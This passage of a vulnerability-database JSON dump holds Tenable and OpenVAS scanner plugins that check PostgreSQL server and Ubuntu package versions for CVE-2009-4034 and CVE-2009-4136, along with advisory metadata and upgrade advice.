{"vector": "NONE", "value": 7.5}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2018-07-26T00:00:00", "cpe": ["cpe:/a:postgresql:postgresql"], "id": "POSTGRESQL_20091214.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63348", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63348);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/26 13:32:42\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_bugtraq_id(37333, 37334);\n\n script_name(english:\"PostgreSQL 7.4 < 7.4.27 / 8.0 < 8.0.23 / 8.1 < 8.1.19 / 8.2 < 8.2.15 / 8.3 < 8.3.9 / 8.4 < 8.4.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PostgreSQL\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of PostgreSQL installed on the remote host is 7.4 prior to\n7.4.27, 8.0 prior to 8.0.23, 8.1 prior to 8.1.19, 8.2 prior to 8.2.15,\n8.3 prior to 8.3.9 or 8.4 prior to 8.4.2. As such, it is potentially\naffected by multiple vulnerabilities :\n\n - NULL bytes in SSL Certificates can be used to falsify \n client or server authentication. (CVE-2009-4034)\n\n - Privilege escalation is possible via changing session\n state in an index function. (CVE-2009-4136)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.postgresql.org/about/news/1170/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.postgresql.org/docs/7.4/static/release-7-4-27.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.postgresql.org/docs/8.0/static/release-8-0-23.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.postgresql.org/docs/8.1/static/release-8-1-19.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.postgresql.org/docs/8.2/static/release-8-2-15.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.postgresql.org/docs/8.3/static/release-8-3-9.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.postgresql.org/docs/8.4/static/release-8-4-2.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PostgreSQL 7.4.27 / 8.0.23 / 8.1.19 / 8.2.15 / 8.3.9 / 8.4.2\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:postgresql:postgresql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"postgresql_version.nbin\");\n script_require_ports(\"Services/postgresql\", 5432);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_service(svc:\"postgresql\", default:5432, exit_on_fail:TRUE);\n\nversion = get_kb_item_or_exit('database/'+port+'/postgresql/version');\nsource = get_kb_item_or_exit('database/'+port+'/postgresql/source');\ndatabase = get_kb_item('database/'+port+'/postgresql/database_name');\n\nget_backport_banner(banner:source);\nif (backported && report_paranoia < 2) audit(AUDIT_BACKPORT_SERVICE, port, 'PostgreSQL server');\n\nver = split(version, sep:'.');\nfor (i=0; i < max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] == 7 && ver[1] == 4 && ver[2] < 27) ||\n (ver[0] == 8 && ver[1] == 0 && ver[2] < 23) ||\n (ver[0] == 8 && ver[1] == 1 && ver[2] < 19) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 15) ||\n (ver[0] == 8 && ver[1] == 3 && ver[2] < 9) ||\n (ver[0] == 8 && ver[1] == 4 && ver[2] < 2) \n)\n{\n if (report_verbosity > 0)\n {\n report = '';\n if(database)\n report += '\\n Database name : ' + database;\n report +=\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.4.27 / 8.0.23 / 8.1.19 / 8.2.15 / 8.3.9 / 8.4.2\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'PostgreSQL', port, version);\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-01-18T11:05:13", "references": ["http://www.ubuntu.com/usn/usn-876-1/", "876-1"], "pluginID": "1361412562310840360", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-876-1", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-15T00:00:00", "title": "Ubuntu Update for PostgreSQL vulnerabilities USN-876-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2018-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840360", "id": "OPENVAS:1361412562310840360", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_876_1.nasl 8440 2018-01-17 07:58:46Z teissa $\n#\n# Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that PostgreSQL did not properly handle certificates with\n NULL characters in the Common Name field of X.509 certificates. An attacker\n could exploit this to perform a man in the middle attack to view sensitive\n information or alter encrypted communications. (CVE-2009-4034)\n\n It was discovered that PostgreSQL did not properly manage session-local\n state. A remote authenticated user could exploit this to escalate\n priviliges within PostgreSQL. (CVE-2009-4136)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-876-1\";\ntag_affected = \"PostgreSQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-876-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840360\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"876-1\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_name(\"Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg5\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq4\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:04", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=546321", "https://bugzilla.redhat.com/show_bug.cgi?id=547662"], "pluginID": "66569", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Fedora Core 12 FEDORA-2009-13381 (postgresql)", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66569", "id": "OPENVAS:66569", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13381.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13381 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.4.2-1\n- Update to PostgreSQL 